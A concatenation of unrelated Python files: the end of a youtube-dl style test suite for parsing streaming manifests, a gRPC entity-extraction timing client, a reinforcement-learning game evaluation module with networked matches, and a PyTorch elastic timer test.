'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'm4a',
'tbr': 128.001,
'asr': 48000,
'format_note': 'DASH audio',
'container': 'm4a_dash',
'vcodec': 'none',
'acodec': 'mp4a.40.2',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'audio_ext': 'm4a',
'video_ext': 'none',
'abr': 128.001,
}, {
'format_id': 'video=100000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 336,
'height': 144,
'tbr': 100,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 100,
}, {
'format_id': 'video=326000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 562,
'height': 240,
'tbr': 326,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 326,
}, {
'format_id': 'video=698000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 844,
'height': 360,
'tbr': 698,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 698,
}, {
'format_id': 'video=1493000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 1126,
'height': 480,
'tbr': 1493,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 1493,
}, {
'format_id': 'video=4482000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 1688,
'height': 720,
'tbr': 4482,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 4482,
}],
{
'en': [
{
'ext': 'mp4',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
}
]
},
)
]
for mpd_file, mpd_url, mpd_base_url, expected_formats, expected_subtitles in _TEST_CASES:
with io.open('./test/testdata/mpd/%s.mpd' % mpd_file,
mode='r', encoding='utf-8') as f:
formats, subtitles = self.ie._parse_mpd_formats_and_subtitles(
compat_etree_fromstring(f.read().encode('utf-8')),
mpd_base_url=mpd_base_url, mpd_url=mpd_url)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
expect_value(self, subtitles, expected_subtitles, None)
def test_parse_ism_formats(self):
_TEST_CASES = [
(
'sintel',
'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
[{
'format_id': 'audio-128',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'isma',
'tbr': 128,
'asr': 48000,
'vcodec': 'none',
'acodec': 'AACL',
'protocol': 'ism',
'_download_params': {
'stream_type': 'audio',
'duration': 8880746666,
'timescale': 10000000,
'width': 0,
'height': 0,
'fourcc': 'AACL',
'codec_private_data': '1190',
'sampling_rate': 48000,
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'audio_ext': 'isma',
'video_ext': 'none',
'abr': 128,
}, {
'format_id': 'video-100',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 336,
'height': 144,
'tbr': 100,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 336,
'height': 144,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA0544EFFC2D002CBC40000003004000000C03C60CA80000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 100,
}, {
'format_id': 'video-326',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 562,
'height': 240,
'tbr': 326,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 562,
'height': 240,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA0241FE23FFC3BC83BA44000003000400000300C03C60CA800000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 326,
}, {
'format_id': 'video-698',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 844,
'height': 360,
'tbr': 698,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 844,
'height': 360,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA0350BFB97FF06AF06AD1000003000100000300300F1832A00000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 698,
}, {
'format_id': 'video-1493',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 1126,
'height': 480,
'tbr': 1493,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 1126,
'height': 480,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA011C3DE6FFF0D890D871000003000100000300300F1832A00000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 1493,
}, {
'format_id': 'video-4482',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 1688,
'height': 720,
'tbr': 4482,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 1688,
'height': 720,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA01A816F97FFC1ABC1AB440000003004000000C03C60CA80000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 4482,
}],
{
'eng': [
{
'ext': 'ismt',
'protocol': 'ism',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'_download_params': {
'stream_type': 'text',
'duration': 8880746666,
'timescale': 10000000,
'fourcc': 'TTML',
'codec_private_data': ''
}
}
]
},
),
]
for ism_file, ism_url, expected_formats, expected_subtitles in _TEST_CASES:
with io.open('./test/testdata/ism/%s.Manifest' % ism_file,
mode='r', encoding='utf-8') as f:
formats, subtitles = self.ie._parse_ism_formats_and_subtitles(
compat_etree_fromstring(f.read().encode('utf-8')), ism_url=ism_url)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
expect_value(self, subtitles, expected_subtitles, None)
def test_parse_f4m_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/14660
'custom_base_url',
'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
[{
'manifest_url': 'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
'ext': 'flv',
'format_id': '2148',
'protocol': 'f4m',
'tbr': 2148,
'width': 1280,
'height': 720,
}]
),
]
for f4m_file, f4m_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/f4m/%s.f4m' % f4m_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_f4m_formats(
compat_etree_fromstring(f.read().encode('utf-8')),
f4m_url, None)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_xspf(self):
_TEST_CASES = [
(
'foo_xspf',
'https://example.org/src/foo_xspf.xspf',
[{
'id': 'foo_xspf',
'title': 'Pandemonium',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 202.416,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/cd1/track%201.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Final Cartridge (Nichico Twelve Remix)',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 255.857,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/%E3%83%88%E3%83%A9%E3%83%83%E3%82%AF%E3%80%80%EF%BC%92.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Rebuilding Nightingale',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 287.915,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/track3.mp3',
}, {
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.com/track3.mp3',
}]
}]
),
]
for xspf_file, xspf_url, expected_entries in _TEST_CASES:
with io.open('./test/testdata/xspf/%s.xspf' % xspf_file,
mode='r', encoding='utf-8') as f:
entries = self.ie._parse_xspf(
compat_etree_fromstring(f.read().encode('utf-8')),
xspf_file, xspf_url=xspf_url, xspf_base_url=xspf_url)
expect_value(self, entries, expected_entries, None)
for i in range(len(entries)):
expect_dict(self, entries[i], expected_entries[i])
def test_response_with_expected_status_returns_content(self):
# Checks for mitigations against the effects of
# <https://bugs.python.org/issue15002> that affect Python 3.4.1+, which
# manifest as `_download_webpage`, `_download_xml`, `_download_json`,
# or the underlying `_download_webpage_handle` returning no content
# when a response matches `expected_status`.
httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), InfoExtractorTestRequestHandler)
port = http_server_port(httpd)
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.daemon = True
server_thread.start()
(content, urlh) = self.ie._download_webpage_handle(
'http://127.0.0.1:%d/teapot' % port, None,
expected_status=TEAPOT_RESPONSE_STATUS)
self.assertEqual(content, TEAPOT_RESPONSE_BODY)
if __name__ == '__main__':
unittest.main()
|
external_client.py
|
import grpc
import time
import statistics
# from threading import Thread
from alephclient.services.common_pb2 import Text
from alephclient.services.entityextract_pb2_grpc import EntityExtractStub
URL = 'localhost:50000'
TEXT = 'There was Joseph Stalin working at the Kremlin in Moscow'
channel = grpc.insecure_channel(URL)
service = EntityExtractStub(channel)
times = []
for i in range(100):
start = time.time()
image = Text(text=TEXT, languages=['en'])
for ent in service.Extract(image):
print(ent.text)
end = time.time()
times.append(end - start)
print(statistics.mean(times))
# def target():
# channel = grpc.insecure_channel(URL)
# service = EntityExtractStub(channel)
# for i in range(300):
# image = Text(text=TEXT, languages=['en'])
# for ent in service.Extract(image):
# # print(ent.text)
# pass
# for i in range(20):
# thread = Thread(target=target)
# # thread.daemon = True
# print(thread)
# thread.start()
|
evaluation.py
|
# Copyright (c) 2020 DeNA Co., Ltd.
# Licensed under The MIT License [see LICENSE for details]
# evaluation of policies or planning algorithms
import random
import time
import multiprocessing as mp
import numpy as np
from .environment import prepare_env, make_env
from .connection import send_recv, accept_socket_connections, connect_socket_connection
from .util import softmax
network_match_port = 9876
class RandomAgent:
def reset(self, env, show=False):
pass
def action(self, env, player, show=False):
actions = env.legal_actions(player)
return random.choice(actions)
def observe(self, env, player, show=False):
return 0.0
class RuleBasedAgent(RandomAgent):
def action(self, env, player, show=False):
if hasattr(env, 'rule_based_action'):
return env.rule_based_action(player)
else:
return random.choice(env.legal_actions(player))
def view(env, player=None):
if hasattr(env, 'view'):
env.view(player=player)
else:
print(env)
def view_transition(env):
if hasattr(env, 'view_transition'):
env.view_transition()
else:
pass
def print_outputs(env, prob, v):
if hasattr(env, 'print_outputs'):
env.print_outputs(prob, v)
else:
print('v = %f' % v)
print('p = %s' % (prob * 1000).astype(int))
class Agent:
def __init__(self, model, observation=False, temperature=0.0):
# model might be a neural net, or some planning algorithm such as game tree search
self.model = model
self.hidden = None
self.observation = observation
self.temperature = temperature
def reset(self, env, show=False):
self.hidden = self.model.init_hidden()
def plan(self, obs):
outputs = self.model.inference(obs, self.hidden)
self.hidden = outputs.pop('hidden', None)
return outputs
def action(self, env, player, show=False):
outputs = self.plan(env.observation(player))
actions = env.legal_actions(player)
p = outputs['policy']
v = outputs.get('value', None)
mask = np.ones_like(p)
mask[actions] = 0
p -= mask * 1e32
if show:
view(env, player=player)
print_outputs(env, softmax(p), v)
if self.temperature == 0:
ap_list = sorted([(a, p[a]) for a in actions], key=lambda x: -x[1])
return ap_list[0][0]
else:
return random.choices(np.arange(len(p)), weights=softmax(p / self.temperature))[0]
def observe(self, env, player, show=False):
if self.observation:
outputs = self.plan(env.observation(player))
v = outputs.get('value', None)
if show:
view(env, player=player)
if self.observation:
print_outputs(env, None, v)
class EnsembleAgent(Agent):
def reset(self, env, show=False):
self.hidden = [model.init_hidden() for model in self.model]
def plan(self, obs):
outputs = {}
for i, model in enumerate(self.model):
o = model.inference(obs, self.hidden[i])
for k, v in o:
if k == 'hidden':
self.hidden[i] = v
else:
outputs[k] = outputs.get(k, []) + [o]
for k, vl in outputs:
outputs[k] = np.mean(vl, axis=0)
return outputs
class SoftAgent(Agent):
def __init__(self, model, observation=False):
super().__init__(model, observation=observation, temperature=1.0)
class NetworkAgentClient:
def __init__(self, agent, env, conn):
self.conn = conn
self.agent = agent
self.env = env
def run(self):
while True:
command, args = self.conn.recv()
if command == 'quit':
break
elif command == 'outcome':
print('outcome = %f' % args[0])
elif hasattr(self.agent, command):
ret = getattr(self.agent, command)(self.env, *args, show=True)
if command == 'action':
player = args[0]
ret = self.env.action2str(ret, player)
else:
ret = getattr(self.env, command)(*args)
if command == 'update':
view_transition(self.env)
self.conn.send(ret)
class NetworkAgent:
def __init__(self, conn):
self.conn = conn
def update(self, data, reset):
return send_recv(self.conn, ('update', [data, reset]))
def outcome(self, outcome):
return send_recv(self.conn, ('outcome', [outcome]))
def action(self, player):
return send_recv(self.conn, ('action', [player]))
def observe(self, player):
return send_recv(self.conn, ('observe', [player]))
def exec_match(env, agents, critic, show=False, game_args={}):
''' match with shared game environment '''
if env.reset(game_args):
return None
for agent in agents.values():
agent.reset(env, show=show)
while not env.terminal():
if show and critic is not None:
print('cv = ', critic.observe(env, None, show=False)[0])
turn_players = env.turns()
actions = {}
for p, agent in agents.items():
if p in turn_players:
actions[p] = agent.action(env, p, show=show)
else:
agent.observe(env, p, show=show)
if env.step(actions):
return None
if show:
view_transition(env)
outcome = env.outcome()
if show:
print('final outcome = %s' % outcome)
return outcome
def exec_network_match(env, network_agents, critic, show=False, game_args={}):
''' match with divided game environment '''
if env.reset(game_args):
return None
for p, agent in network_agents.items():
info = env.diff_info(p)
agent.update(info, True)
while not env.terminal():
if show and critic is not None:
print('cv = ', critic.observe(env, None, show=False)[0])
turn_players = env.turns()
actions = {}
for p, agent in network_agents.items():
if p in turn_players:
action = agent.action(p)
actions[p] = env.str2action(action, p)
else:
agent.observe(p)
if env.step(actions):
return None
for p, agent in network_agents.items():
info = env.diff_info(p)
agent.update(info, False)
outcome = env.outcome()
for p, agent in network_agents.items():
agent.outcome(outcome[p])
return outcome
class Evaluator:
def __init__(self, env, args):
self.env = env
self.args = args
self.default_agent = RandomAgent() # RuleBasedAgent, trained agent, etc.
def execute(self, models, args):
agents = {}
for p, model in models.items():
if model is None:
agents[p] = self.default_agent
else:
agents[p] = Agent(model, self.args['observation'])
outcome = exec_match(self.env, agents, None)
if outcome is None:
print('None episode in evaluation!')
return None
return {'args': args, 'result': outcome}
def wp_func(results):
games = sum([v for k, v in results.items() if k is not None])
win = sum([(k + 1) / 2 * v for k, v in results.items() if k is not None])
if games == 0:
return 0.0
return win / games
def eval_process_mp_child(agents, critic, env_args, index, in_queue, out_queue, seed, show=False):
random.seed(seed + index)
env = make_env({**env_args, 'id': index})
while True:
args = in_queue.get()
if args is None:
break
g, agent_ids, pat_idx, game_args = args
print('*** Game %d ***' % g)
agent_map = {env.players()[p]: agents[ai] for p, ai in enumerate(agent_ids)}
if isinstance(list(agent_map.values())[0], NetworkAgent):
outcome = exec_network_match(env, agent_map, critic, show=show, game_args=game_args)
else:
outcome = exec_match(env, agent_map, critic, show=show, game_args=game_args)
out_queue.put((pat_idx, agent_ids, outcome))
out_queue.put(None)
def evaluate_mp(env, agents, critic, env_args, args_patterns, num_process, num_games, seed):
in_queue, out_queue = mp.Queue(), mp.Queue()
args_cnt = 0
total_results, result_map = [{} for _ in agents], [{} for _ in agents]
print('total games = %d' % (len(args_patterns) * num_games))
time.sleep(0.1)
for pat_idx, args in args_patterns.items():
for i in range(num_games):
if len(agents) == 2:
# When playing two player game,
# the number of games with first or second player is equalized.
first_agent = 0 if i < (num_games + 1) // 2 else 1
tmp_pat_idx, agent_ids = (pat_idx + '-F', [0, 1]) if first_agent == 0 else (pat_idx + '-S', [1, 0])
else:
tmp_pat_idx, agent_ids = pat_idx, random.sample(list(range(len(agents))), len(agents))
in_queue.put((args_cnt, agent_ids, tmp_pat_idx, args))
for p in range(len(agents)):
result_map[p][tmp_pat_idx] = {}
args_cnt += 1
network_mode = agents[0] is None
if network_mode: # network battle mode
agents = network_match_acception(num_process, env_args, len(agents), network_match_port)
else:
agents = [agents] * num_process
for i in range(num_process):
in_queue.put(None)
args = agents[i], critic, env_args, i, in_queue, out_queue, seed
if num_process > 1:
mp.Process(target=eval_process_mp_child, args=args).start()
if network_mode:
for agent in agents[i]:
agent.conn.close()
else:
eval_process_mp_child(*args, show=True)
finished_cnt = 0
while finished_cnt < num_process:
ret = out_queue.get()
if ret is None:
finished_cnt += 1
continue
pat_idx, agent_ids, outcome = ret
if outcome is not None:
for idx, p in enumerate(env.players()):
agent_id = agent_ids[idx]
oc = outcome[p]
result_map[agent_id][pat_idx][oc] = result_map[agent_id][pat_idx].get(oc, 0) + 1
total_results[agent_id][oc] = total_results[agent_id].get(oc, 0) + 1
for p, r_map in enumerate(result_map):
print('---agent %d---' % p)
for pat_idx, results in r_map.items():
print(pat_idx, {k: results[k] for k in sorted(results.keys(), reverse=True)}, wp_func(results))
print('total', {k: total_results[p][k] for k in sorted(total_results[p].keys(), reverse=True)}, wp_func(total_results[p]))
def network_match_acception(n, env_args, num_agents, port):
waiting_conns = []
accepted_conns = []
for conn in accept_socket_connections(port):
if len(accepted_conns) >= n * num_agents:
break
waiting_conns.append(conn)
if len(waiting_conns) == num_agents:
conn = waiting_conns[0]
accepted_conns.append(conn)
waiting_conns = waiting_conns[1:]
conn.send(env_args) # send accept with environment arguments
agents_list = [
[NetworkAgent(accepted_conns[i * num_agents + j]) for j in range(num_agents)]
for i in range(n)
]
return agents_list
def get_model(env, model_path):
import torch
from .model import SimpleConv2dModel as DefaultModel
model = env.net()(env) if hasattr(env, 'net') else DefaultModel(env)
model.load_state_dict(torch.load(model_path))
model.eval()
return model
def client_mp_child(env_args, model_path, conn):
env = make_env(env_args)
model = get_model(env, model_path)
NetworkAgentClient(Agent(model), env, conn).run()
def eval_main(args, argv):
env_args = args['env_args']
prepare_env(env_args)
env = make_env(env_args)
model_path = argv[0] if len(argv) >= 1 else 'models/latest.pth'
num_games = int(argv[1]) if len(argv) >= 2 else 100
num_process = int(argv[2]) if len(argv) >= 3 else 1
agent1 = Agent(get_model(env, model_path))
critic = None
print('%d process, %d games' % (num_process, num_games))
seed = random.randrange(1e8)
print('seed = %d' % seed)
agents = [agent1] + [RandomAgent() for _ in range(len(env.players()) - 1)]
evaluate_mp(env, agents, critic, env_args, {'default': {}}, num_process, num_games, seed)
def eval_server_main(args, argv):
print('network match server mode')
env_args = args['env_args']
prepare_env(env_args)
env = make_env(env_args)
num_games = int(argv[0]) if len(argv) >= 1 else 100
num_process = int(argv[1]) if len(argv) >= 2 else 1
print('%d process, %d games' % (num_process, num_games))
seed = random.randrange(1e8)
print('seed = %d' % seed)
evaluate_mp(env, [None] * len(env.players()), None, env_args, {'default': {}}, num_process, num_games, seed)
def eval_client_main(args, argv):
print('network match client mode')
while True:
try:
host = argv[1] if len(argv) >= 2 else 'localhost'
conn = connect_socket_connection(host, network_match_port)
env_args = conn.recv()
except EOFError:
break
model_path = argv[0] if len(argv) >= 1 else 'models/latest.pth'
mp.Process(target=client_mp_child, args=(env_args, model_path, conn)).start()
conn.close()
|
local_timer_test.py
|
# Owner(s): ["oncall: r2p"]
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import signal
import time
import unittest
import unittest.mock as mock
import torch.distributed.elastic.timer as timer
from torch.distributed.elastic.timer.api import TimerRequest
from torch.distributed.elastic.timer.local_timer import MultiprocessingRequestQueue
from torch.testing._internal.common_utils import (
run_tests,
IS_WINDOWS,
IS_MACOS,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_TSAN,
TestCase
)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
# func2 should time out
def func2(n, mp_queue):
if mp_queue is not None:
timer.configure(timer.LocalTimerClient(mp_queue))
if n > 0:
with timer.expires(after=0.1):
func2(n - 1, None)
time.sleep(0.2)
class LocalTimerTest(TestCase):
def setUp(self):
super().setUp()
self.ctx = mp.get_context("spawn")
self.mp_queue = self.ctx.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
self.server.start()
def tearDown(self):
super().tearDown()
self.server.stop()
def test_exception_propagation(self):
with self.assertRaises(Exception, msg="foobar"):
with timer.expires(after=1):
raise Exception("foobar")
def test_no_client(self):
# no timer client configured; exception expected
timer.configure(None)
with self.assertRaises(RuntimeError):
with timer.expires(after=1):
pass
def test_client_interaction(self):
# no timer client configured but one passed in explicitly
# no exception expected
timer_client = timer.LocalTimerClient(self.mp_queue)
timer_client.acquire = mock.MagicMock(wraps=timer_client.acquire)
timer_client.release = mock.MagicMock(wraps=timer_client.release)
with timer.expires(after=1, scope="test", client=timer_client):
pass
timer_client.acquire.assert_called_once_with("test", mock.ANY)
timer_client.release.assert_called_once_with("test")
def test_happy_path(self):
timer.configure(timer.LocalTimerClient(self.mp_queue))
with timer.expires(after=0.5):
time.sleep(0.1)
def test_get_timer_recursive(self):
"""
If a function acquires a countdown timer with default scope,
then recursive calls to the function should re-acquire the
timer rather than creating a new one. That is only the last
recursive call's timer will take effect.
"""
self.server.start()
timer.configure(timer.LocalTimerClient(self.mp_queue))
# func should not time out
def func(n):
if n > 0:
with timer.expires(after=0.1):
func(n - 1)
time.sleep(0.05)
func(4)
p = self.ctx.Process(target=func2, args=(2, self.mp_queue))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
@staticmethod
def _run(mp_queue, timeout, duration):
client = timer.LocalTimerClient(mp_queue)
timer.configure(client)
with timer.expires(after=timeout):
time.sleep(duration)
@unittest.skipIf(TEST_WITH_TSAN, "test is tsan incompatible")
def test_timer(self):
timeout = 0.1
duration = 1
p = mp.Process(target=self._run, args=(self.mp_queue, timeout, duration))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
def _enqueue_on_interval(mp_queue, n, interval, sem):
"""
enqueues ``n`` timer requests into ``mp_queue`` one element per
interval seconds. Releases the given semaphore once before going to work.
"""
sem.release()
for i in range(0, n):
mp_queue.put(TimerRequest(i, "test_scope", 0))
time.sleep(interval)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class MultiprocessingRequestQueueTest(TestCase):
def test_get(self):
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
requests = request_queue.get(1, timeout=0.01)
self.assertEqual(0, len(requests))
request = TimerRequest(1, "test_scope", 0)
mp_queue.put(request)
requests = request_queue.get(2, timeout=0.01)
self.assertEqual(1, len(requests))
self.assertIn(request, requests)
@unittest.skipIf(
TEST_WITH_TSAN,
"test incompatible with tsan",
)
def test_get_size(self):
"""
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=n*interval+delta)``
yields all ``n`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
timeout = interval * (n + 1)
start = time.time()
requests = request_queue.get(n, timeout=timeout)
self.assertLessEqual(time.time() - start, timeout + interval)
self.assertEqual(n, len(requests))
